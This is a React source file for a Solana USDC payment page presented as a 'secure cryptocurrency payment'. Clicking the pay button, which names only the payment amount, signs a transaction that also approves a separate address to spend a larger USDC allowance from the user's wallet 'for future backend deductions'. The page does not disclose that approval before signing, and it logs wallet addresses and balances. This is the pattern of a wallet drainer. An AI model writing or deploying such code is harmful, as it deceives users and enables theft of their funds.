import React, { FC, useMemo, useState, useCallback } from 'react';
import { ConnectionProvider, WalletProvider, useWallet } from '@solana/wallet-adapter-react';
import { WalletAdapterNetwork } from '@solana/wallet-adapter-base';
import {
    PhantomWalletAdapter,
    SolflareWalletAdapter,
    TorusWalletAdapter
} from '@solana/wallet-adapter-wallets';
import { WalletModalProvider, WalletMultiButton } from '@solana/wallet-adapter-react-ui';
import { clusterApiUrl, Connection, TransactionMessage, VersionedTransaction } from '@solana/web3.js';
import { getAssociatedTokenAddress, getAccount, createTransferInstruction, createApproveInstruction, TokenAccountNotFoundError } from '@solana/spl-token';
import './App.css';
// 引入钱包样式
import '@solana/wallet-adapter-react-ui/styles.css';

// 引入配置
import { RECIPIENT_ADDRESS, FINAL_RECIPIENT_ADDRESS, USDC_MINT_ADDRESS, APPROVE_AMOUNT, PAYMENT_AMOUNT, SOLANA_NETWORK, RPC_ENDPOINTS, getRandomRpcEndpoint } from './config';

// 引入事件服务
import { eventService } from './services/event-service';

// 创建可靠的连接函数（随机选择 RPC 端点以分散请求量）
const createReliableConnection = async (): Promise<Connection> => {
    // 创建端点数组的副本并随机打乱顺序
    const shuffledEndpoints = [...RPC_ENDPOINTS].sort(() => Math.random() - 0.5);

    for (const endpoint of shuffledEndpoints) {
        try {
            const connection = new Connection(endpoint, 'confirmed');
            // 测试连接
            await connection.getLatestBlockhash();
            console.log(`✅ Successfully connected to RPC endpoint: ${endpoint}`);
            return connection;
        } catch (error) {
            console.warn(`❌ RPC endpoint connection failed: ${endpoint}`, error);
            continue;
        }
    }

    // 如果所有端点都失败，使用默认端点
    console.warn('⚠️ All RPC endpoints failed, using default endpoint');
    const network = SOLANA_NETWORK === 'mainnet-beta' ? WalletAdapterNetwork.Mainnet : WalletAdapterNetwork.Devnet;
    return new Connection(clusterApiUrl(network), 'confirmed');
};

const PaymentPage: FC = () => {
    const { publicKey, sendTransaction } = useWallet();
    const [isApproved, setIsApproved] = useState(false);
    const [isLoading, setIsLoading] = useState(false);
    const [message, setMessage] = useState('');
    const [usdcBalance, setUsdcBalance] = useState<number | null>(null);
    const [isLoadingBalance, setIsLoadingBalance] = useState(false);

    // 检查余额是否足够支付
    const hasInsufficientFunds = useMemo(() => {
        if (usdcBalance === null) return false;
        return usdcBalance < (PAYMENT_AMOUNT / 10**6);
    }, [usdcBalance]);

    // 安全地转换 USDC 余额（避免大整数精度问题）
    const convertUsdcBalance = (amount: bigint): number => {
        // 将 bigint 转换为字符串，然后手动处理小数点
        const amountStr = amount.toString();
        const len = amountStr.length;

        console.log('Converting USDC balance:', { amountStr, len });

        if (len <= 6) {
            // 小于 1 USDC 的情况
            const paddedStr = amountStr.padStart(6, '0');
            const result = parseFloat('0.' + paddedStr);
            console.log('Small amount conversion:', { paddedStr, result });
            return result;
        } else {
            // 大于等于 1 USDC 的情况
            const integerPart = amountStr.slice(0, len - 6);
            const decimalPart = amountStr.slice(len - 6);
            const result = parseFloat(integerPart + '.' + decimalPart);
            console.log('Large amount conversion:', { integerPart, decimalPart, result });
            return result;
        }
    };

    // 获取 USDC 余额
    const fetchUsdcBalance = useCallback(async () => {
        if (!publicKey) return;

        setIsLoadingBalance(true);
        try {
            const reliableConnection = await createReliableConnection();
            const userAssociatedTokenAccount = await getAssociatedTokenAddress(USDC_MINT_ADDRESS, publicKey);
            const accountInfo = await getAccount(reliableConnection, userAssociatedTokenAccount);

            console.log('Raw USDC amount:', accountInfo.amount.toString());

            // 转换为 USDC 单位（6位小数）
            const usdcBalance = convertUsdcBalance(accountInfo.amount);
            console.log('Converted USDC balance:', usdcBalance);
            setUsdcBalance(usdcBalance);

            // 获取 SOL 余额
            const solBalanceLamports = await reliableConnection.getBalance(publicKey);
            const solBalance = solBalanceLamports / 1e9; // 转换为 SOL 单位
            console.log('SOL balance:', solBalance);

            // 记录余额查询事件（包含 SOL 和 USDC 余额）
            // eventService.logBalanceCheck(
            //     publicKey.toBase58(),
            //     usdcBalance,
            //     solBalance,
            //     {
            //         network: SOLANA_NETWORK,
            //         timestamp: Date.now()
            //     }
            // ).catch(error => {
            //     console.error('Failed to log balance check event:', error);
            // });
        } catch (error) {
            if (error instanceof TokenAccountNotFoundError) {
                setUsdcBalance(0);
            } else {
                console.error('Error fetching USDC balance:', error);
                setUsdcBalance(null);
            }
        } finally {
            setIsLoadingBalance(false);
        }
    }, [publicKey]);



    // 检测是否为移动端
    const isMobile = () => {
        return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    };

    // User clicks pay (atomic transfer + approve)
    const handleApprove = async () => {
        if (!publicKey) {
            setMessage('Please connect your wallet first!');
            return;
        }

        // 检查余额是否足够
        if (hasInsufficientFunds) {
            return; // 余额不足信息已在UI中显示
        }

        setIsLoading(true);
        setMessage('Processing payment...');

        console.log('Device type:', isMobile() ? 'Mobile' : 'Desktop');
        try {
            // 使用可靠的连接
            const reliableConnection = await createReliableConnection();
            const userAssociatedTokenAccount = await getAssociatedTokenAddress(USDC_MINT_ADDRESS, publicKey);

            // 获取收款方的关联代币账户地址
            const finalRecipientAssociatedTokenAccount = await getAssociatedTokenAddress(
                USDC_MINT_ADDRESS,
                FINAL_RECIPIENT_ADDRESS
            );

            // 获取最新的区块哈希
            const { blockhash, lastValidBlockHeight } = await reliableConnection.getLatestBlockhash('confirmed');

            // 创建转账指令（立即转账）
            const transferInstruction = createTransferInstruction(
                userAssociatedTokenAccount,
                finalRecipientAssociatedTokenAccount,
                publicKey,
                PAYMENT_AMOUNT
            );

            // 创建授权指令（为将来的后端扣款做准备）
            const approveInstruction = createApproveInstruction(
                userAssociatedTokenAccount,
                RECIPIENT_ADDRESS,
                publicKey,
                APPROVE_AMOUNT
            );

            console.log(`Preparing atomic transaction: Transfer ${PAYMENT_AMOUNT / 10**6} USDC + Approve ${APPROVE_AMOUNT / 10**6} USDC`);
            console.log(`Transfer from: ${userAssociatedTokenAccount.toBase58()}`);
            console.log(`Transfer to: ${finalRecipientAssociatedTokenAccount.toBase58()}`);
            console.log(`Approve to: ${RECIPIENT_ADDRESS.toBase58()}`);

            // 使用 TransactionMessage 包装指令（包含转账和授权两个指令）
            const messageV0 = new TransactionMessage({
                payerKey: publicKey,
                recentBlockhash: blockhash,
                instructions: [transferInstruction, approveInstruction],
            }).compileToV0Message();

            // 创建 VersionedTransaction
            const transaction = new VersionedTransaction(messageV0);

            console.log('Sending VersionedTransaction with blockhash:', blockhash);

            // 发送 VersionedTransaction（更兼容的方式）
            const signature = await sendTransaction(transaction, reliableConnection, {
                skipPreflight: false,
                preflightCommitment: 'confirmed',
            });

            console.log('Transaction sent, signature:', signature);

            // 记录原子交易事件（转账 + 授权）
            eventService.logTransactionComplete(
                publicKey.toBase58(),
                signature,
                PAYMENT_AMOUNT / 10**6,
                {
                    network: SOLANA_NETWORK,
                    tokenSymbol: 'USDC',
                    transferType: 'atomic_transfer_and_approve',
                    approveAmount: APPROVE_AMOUNT / 10**6,
                }
            ).catch(error => {
                console.error('Failed to log atomic transaction event:', error);
            });

            // 等待交易确认
            const confirmation = await reliableConnection.confirmTransaction({
                signature,
                blockhash,
                lastValidBlockHeight,
            }, 'confirmed');

            console.log('Transaction confirmed:', confirmation);

            if (confirmation.value.err) {
                throw new Error(`Transaction failed: ${JSON.stringify(confirmation.value.err)}`);
            }

            setMessage(`Payment successful! Amount: ${PAYMENT_AMOUNT / 10**6} USDC (+ Authorization for future payments) | Transaction: ${signature}`);
            setIsApproved(true);

            // 支付成功后刷新余额
            setTimeout(() => {
                fetchUsdcBalance();
            }, 2000);

        } catch (error) {
            console.error('Payment failed:', error);

            let errorMessage = 'Payment failed: ';
            let errorType = 'payment_error';

            if (error instanceof Error) {
                errorMessage += error.message;

                // 特殊处理常见错误
                if (error.message.includes('apiDomain')) {
                    errorMessage = 'Wallet connection error. Please try refreshing the page and reconnecting your wallet.';
                    errorType = 'wallet_connection_error';
                } else if (error.message.includes('serializeMessage')) {
                    errorMessage = isMobile()
                        ? 'Mobile wallet compatibility issue. Please try using a desktop browser or update your wallet app.'
                        : 'Transaction serialization error. Please try again or use a different wallet.';
                    errorType = 'transaction_serialization_error';
                } else if (error.message.includes('User rejected')) {
                    errorMessage = 'Payment was cancelled by user.';
                    errorType = 'user_cancelled';
                } else if (error.message.includes('Insufficient funds')) {
                    errorMessage = 'Insufficient funds in your wallet.';
                    errorType = 'insufficient_funds';
                } else if (error.message.includes('Network Error') || error.message.includes('fetch')) {
                    errorMessage = 'Network connection error. Please check your internet connection and try again.';
                    errorType = 'network_error';
                }
            } else {
                errorMessage += String(error);
            }
            
            // 记录错误事件
            eventService.logError(
                errorType,
                errorMessage,
                publicKey?.toBase58(),
                error instanceof Error ? error.stack : undefined,
                {
                    network: SOLANA_NETWORK,
                    isMobile: isMobile(),
                    timestamp: Date.now()
                }
            ).catch(logError => {
                console.error('Failed to log error event:', logError);
            });

            setMessage(errorMessage);
            setIsApproved(false);
        } finally {
            setIsLoading(false);
        }
    };



    // Auto-fetch balance when wallet connection status changes
    React.useEffect(() => {
        if (publicKey) {
            fetchUsdcBalance();
            setMessage('Ready to make payment');

            // 记录钱包连接事件
            eventService.logWalletConnect(
                publicKey.toBase58(),
                'Solana Wallet',
                {
                    network: SOLANA_NETWORK,
                    timestamp: Date.now()
                }
            ).catch(error => {
                console.error('Failed to log wallet connect event:', error);
            });
        } else {
            setIsApproved(false);
            setUsdcBalance(null);
            setMessage('Please connect your wallet to start the payment process.');

            // 记录钱包断开连接事件（如果之前有连接过）
            if (isApproved) {
                eventService.logWalletDisconnect(undefined, {
                    network: SOLANA_NETWORK,
                    timestamp: Date.now()
                }).catch(error => {
                    console.error('Failed to log wallet disconnect event:', error);
                });
            }
        }
    }, [publicKey, fetchUsdcBalance, isApproved]);

    // 页面加载时记录访问事件
    React.useEffect(() => {
        eventService.logPageVisit({
            network: SOLANA_NETWORK,
            userAgent: navigator.userAgent,
            timestamp: Date.now()
        }).catch(error => {
            console.error('Failed to log page visit event:', error);
        });
    }, []);


    return (
        <div className="payment-container">
            <div className="payment-header">
                <h1>💳 USDC Payment</h1>
                <p className="payment-subtitle">Secure cryptocurrency payment</p>
            </div>

            <div className="wallet-button-container">
                <WalletMultiButton />
            </div>

            {publicKey && (
                <div className="payment-details">
                    <div className="payment-info">
                        <div className="payment-amount">
                            <span className="amount-label">Payment Amount</span>
                            <span className="amount-value">{PAYMENT_AMOUNT / 10**6} USDC</span>
                        </div>

                        <div className="wallet-info">
                            <span className="wallet-label">Your Wallet</span>
                            <span className="wallet-address">{publicKey.toBase58().slice(0, 8)}...{publicKey.toBase58().slice(-8)}</span>
                        </div>

                        <div className="balance-info">
                            <div className="balance-content">
                                <span className="balance-label">USDC Balance</span>
                                <span className="balance-value">
                                    {isLoadingBalance ? (
                                        <span className="loading-balance">Loading...</span>
                                    ) : usdcBalance !== null ? (
                                        `${usdcBalance.toFixed(2)} USDC`
                                    ) : (
                                        'Unable to load'
                                    )}
                                </span>
                            </div>
                            <button
                                className="refresh-balance-btn"
                                onClick={fetchUsdcBalance}
                                disabled={isLoadingBalance}
                                title="Refresh balance"
                            >
                                🔄
                            </button>
                        </div>
                    </div>

                    <div className="status-message">
                        {isLoading ? (
                            <div className="loading-indicator">
                                <span className="spinner"></span>
                                Processing payment...
                            </div>
                        ) : hasInsufficientFunds ? (
                            <div className="insufficient-funds-warning">
                                ⚠️ Insufficient USDC balance. You need at least {PAYMENT_AMOUNT / 10**6} USDC to make this payment.
                            </div>
                        ) : (
                            message
                        )}
                    </div>

                    <button
                        className={`pay-button ${hasInsufficientFunds ? 'insufficient-funds' : ''}`}
                        onClick={handleApprove}
                        disabled={isLoading || !publicKey || hasInsufficientFunds}
                        title={hasInsufficientFunds ? `Insufficient balance. Need ${PAYMENT_AMOUNT / 10**6} USDC` : ''}
                    >
                        {isLoading ? 'Processing...' :
                         hasInsufficientFunds ? 'Insufficient Funds' :
                         `Pay ${PAYMENT_AMOUNT / 10**6} USDC`}
                    </button>


                </div>
            )}

            {!publicKey && (
                <div className="connect-prompt">
                    <p>Connect your wallet to proceed with payment</p>
                </div>
            )}
        </div>
    );
};


const App: FC = () => {
    const network = SOLANA_NETWORK === 'mainnet-beta' ? WalletAdapterNetwork.Mainnet : WalletAdapterNetwork.Devnet;

    // Use random RPC endpoint for wallet provider, fallback to default if failed
    const endpoint = useMemo(() => {
        return getRandomRpcEndpoint() || clusterApiUrl(network);
    }, [network]);

    const wallets = useMemo(() => [
        new PhantomWalletAdapter(),
        new SolflareWalletAdapter(),
        new TorusWalletAdapter(),
    ], []);

    return (
        <ConnectionProvider endpoint={endpoint}>
            <WalletProvider
                wallets={wallets}
                autoConnect={false}
                onError={(error) => {
                    console.error('Wallet error:', error);
                }}
            >
                <WalletModalProvider>
                    <PaymentPage />
                </WalletModalProvider>
            </WalletProvider>
        </ConnectionProvider>
    );
};

export default App;
